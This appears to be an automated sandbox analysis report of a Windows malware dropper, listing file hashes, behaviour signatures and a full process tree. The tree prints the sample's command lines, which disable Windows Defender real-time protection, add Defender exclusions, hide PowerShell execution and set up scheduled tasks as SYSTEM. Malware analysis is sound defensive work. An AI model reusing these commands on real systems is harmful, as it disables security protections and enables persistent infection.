Analysis

  • max time kernel
    226s
  • max time network
    227s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    01-08-2024 22:41

General

  • Target

    646bd1d5081c7851c217526bd26a94e72846566980118c4a535bd2ec46350811.exe

  • Size

    7.3MB

  • MD5

    6fce1620f54451526aa1460d8479051f

  • SHA1

    1c2243f37ad624476138243c2a60887aebdb129c

  • SHA256

    646bd1d5081c7851c217526bd26a94e72846566980118c4a535bd2ec46350811

  • SHA512

    851af8aea8186d6619a45a4c7d48e07ab1d6459bac89d8d553a613f3e2e015a8c30f4b07cf4d48b9508c82cbfb4ab68a42ed81a9a0b9dd7617db707835173216

  • SSDEEP

    196608:91O7Ikz4XH8qouJmy3iJR7ScitqtB9tZ8S:3OUoZSiJR7fim9tWS

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\646bd1d5081c7851c217526bd26a94e72846566980118c4a535bd2ec46350811.exe
    "C:\Users\Admin\AppData\Local\Temp\646bd1d5081c7851c217526bd26a94e72846566980118c4a535bd2ec46350811.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Users\Admin\AppData\Local\Temp\7zS4911.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Users\Admin\AppData\Local\Temp\7zS4AD6.tmp\Install.exe
        .\Install.exe /vqdidRsh "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2608
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2756
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2752
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2700
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2792
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2584
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2580
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                    PID:2600
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      7⤵
                        PID:1944
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                    5⤵
                    • Indirect Command Execution
                    PID:2636
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      6⤵
                        PID:2664
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          7⤵
                            PID:2708
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        5⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:1724
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          6⤵
                            PID:2208
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              7⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2288
                              • C:\Windows\SysWOW64\gpupdate.exe
                                "C:\Windows\system32\gpupdate.exe" /force
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:536
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:1236
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:2840
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1800
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              7⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2860
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "bbihiUuOAZYUglmJTV" /SC once /ST 22:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP\wRHBTSbvSOPfhXD\DEPzgNi.exe\" ud /QcdidGO 525403 /S" /V1 /F
                        4⤵
                        • Drops file in Windows directory
                        • Scheduled Task/Job: Scheduled Task
                        PID:1512
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 620
                        4⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:1980
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {53A75D99-B3FE-4B41-95B3-5A82D37533C1} S-1-5-18:NT AUTHORITY\System:Service:
                  1⤵
                    PID:2104
                    • C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP\wRHBTSbvSOPfhXD\DEPzgNi.exe
                      C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP\wRHBTSbvSOPfhXD\DEPzgNi.exe ud /QcdidGO 525403 /S
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Modifies data under HKEY_USERS
                      PID:2272
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1648
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:2368
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2320
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                                PID:1896
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1388
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              5⤵
                                PID:716
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  6⤵
                                    PID:1528
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                PID:3008
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1108
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1756
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:1564
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  5⤵
                                    PID:1616
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3056
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                  4⤵
                                  • Indirect Command Execution
                                  • System Location Discovery: System Language Discovery
                                  PID:444
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1048
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2476
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1072
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gvwtCLvMe" /SC once /ST 08:13:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:348
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gvwtCLvMe"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1748
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /DELETE /F /TN "gvwtCLvMe"
                                3⤵
                                  PID:2744
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  3⤵
                                    PID:2908
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2968
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    3⤵
                                      PID:2588
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        • System Location Discovery: System Language Discovery
                                        PID:2700
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gYOZSLDjm" /SC once /ST 10:39:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2596
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gYOZSLDjm"
                                      3⤵
                                        PID:2652
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gYOZSLDjm"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2176
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                        3⤵
                                        • Indirect Command Execution
                                        PID:2776
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          4⤵
                                            PID:2336
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2724
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1640
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:32
                                          3⤵
                                            PID:2224
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2924
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                              PID:2764
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • Windows security bypass
                                                • System Location Discovery: System Language Discovery
                                                PID:2864
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:696
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:996
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:64
                                                  3⤵
                                                    PID:1912
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dvCPKpbdOyEnPlbQ" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1700
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C copy nul "C:\Windows\Temp\dvCPKpbdOyEnPlbQ\mQaEPoNX\sVtktNuytcYNwMWI.wsf"
                                                    3⤵
                                                      PID:3020
                                                    • C:\Windows\SysWOW64\wscript.exe
                                                      wscript "C:\Windows\Temp\dvCPKpbdOyEnPlbQ\mQaEPoNX\sVtktNuytcYNwMWI.wsf"
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies data under HKEY_USERS
                                                      PID:2008
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EiOFWbnFxWLNFdZXKhR" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1952
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EiOFWbnFxWLNFdZXKhR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        • System Location Discovery: System Language Discovery
                                                        PID:672
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NeZWLpfMAhqU2" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1240
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NeZWLpfMAhqU2" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1560
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eOISJpbOU" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2040
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eOISJpbOU" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1508
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\khqZzjjJsExFC" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2216
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\khqZzjjJsExFC" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1648
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wHBDKkBCrjUn" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1224
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wHBDKkBCrjUn" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1408
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\vNwAEuYqEraFXGVB" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:1740
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\vNwAEuYqEraFXGVB" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2140
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2532
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1092
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jbJDvxQypZFbaJytP" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:636
                                                      • C:\Windows\SysWOW64\reg.exe
